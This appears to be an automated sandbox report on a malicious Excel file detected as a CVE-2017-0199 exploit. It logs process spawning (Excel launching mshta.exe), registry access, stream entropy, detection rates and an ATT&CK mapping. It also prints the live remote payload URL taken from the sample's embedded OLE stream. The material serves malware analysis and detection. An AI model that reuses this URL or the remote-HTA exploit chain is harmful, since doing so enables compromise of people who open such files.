Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63570
Source: unknown	Network traffic detected: HTTP traffic on port 63570 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63576 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63575 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63575
Source: unknown	Network traffic detected: HTTP traffic on port 63582 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63576

Source: unknown

HTTPS traffic detected: 2.22.242.113:443 -> 192.168.2.24:63582 version: TLS 1.2

System Summary

Excel sheet contains many unusual embedded objects

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	OLE: Microsoft Excel 2007+
Source: ~DFBCA3F597EEDC166E.TMP.0.dr	OLE: Microsoft Excel 2007+
Source: CC850000.0.dr	OLE: Microsoft Excel 2007+

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

OLE indicator, VBA macros: true

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	Stream path 'MBD00420639/\x1Ole' : https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxWK8;FJtx&uZ\|f2"bE5,X\|mG\GWF\|pSv5XJ:k\0T2<r>/BX7Kn-=b}l/-ixXkJrq4rF$_\rdWm5<KkI$uGjQE5"OP.}.o#+CN7pT5arTpeIaEGjyTM5OmqzAtSwP7Kwncs3NxnE1r9FnzcB0ZzIoxJNnL4si9srrBa28Y7mVHKh3TGdkaW2s9KYZrQQvBzgSe53qvJFth5Bu5usXxsl7tmmxzf&34-)C%^>7sTn;
Source: CC850000.0.dr	Stream path 'MBD00420639/\x1Ole' : https://link.saja.market/l33LNEfFvd?&candidate=blushing&august=royal&manxWK8;FJtx&uZ\|f2"bE5,X\|mG\GWF\|pSv5XJ:k\0T2<r>/BX7Kn-=b}l/-ixXkJrq4rF$_\rdWm5<KkI$uGjQE5"OP.}.o#+CN7pT5arTpeIaEGjyTM5OmqzAtSwP7Kwncs3NxnE1r9FnzcB0ZzIoxJNnL4si9srrBa28Y7mVHKh3TGdkaW2s9KYZrQQvBzgSe53qvJFth5Bu5usXxsl7tmmxzf&34-)C%^>7sTn;

Source: ~DFBCA3F597EEDC166E.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Window title found: microsoft excel okexcel cannot open the file 'securiteinfo.com.exploit.cve-2017-0199.05.gen.17087.14702.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.

Source: classification engine

Classification label: mal60.expl.winXLSX@6/14@4/4

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\Desktop\~$SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{B54C726B-7536-4F20-8418-90CE65C7F04D} - OProcSessId.dat

Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	OLE indicator, Workbook stream: true
Source: CC850000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	ReversingLabs: Detection: 23%
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	Virustotal: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Section loaded: c2r64.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Directory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Static file information: File size 1091072 > 1048576

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll

Jump to behavior

Source: ~DFBCA3F597EEDC166E.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx

Initial sample: OLE indicators encrypted = True

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	Stream path 'MBD00420638/Package' entropy: 7.98871009096 (max. 8.0)
Source: SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.17087.14702.xlsx	Stream path 'Workbook' entropy: 7.99851520925 (max. 8.0)
Source: ~DFBCA3F597EEDC166E.TMP.0.dr	Stream path 'Package' entropy: 7.99074409815 (max. 8.0)
Source: CC850000.0.dr	Stream path 'MBD00420638/Package' entropy: 7.99074409815 (max. 8.0)
Source: CC850000.0.dr	Stream path 'Workbook' entropy: 7.99757962009 (max. 8.0)

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 775

Jump to behavior

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	13 Exploitation for Client Execution	1 Scripting	1 Process Injection	3 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
